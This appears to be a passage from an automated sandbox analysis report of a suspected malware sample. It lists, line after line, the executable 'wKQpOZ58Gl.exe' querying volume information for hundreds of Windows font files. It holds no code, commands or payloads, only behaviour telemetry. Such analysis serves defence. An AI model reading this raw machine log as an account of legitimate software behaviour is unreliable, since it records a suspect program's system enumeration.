                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
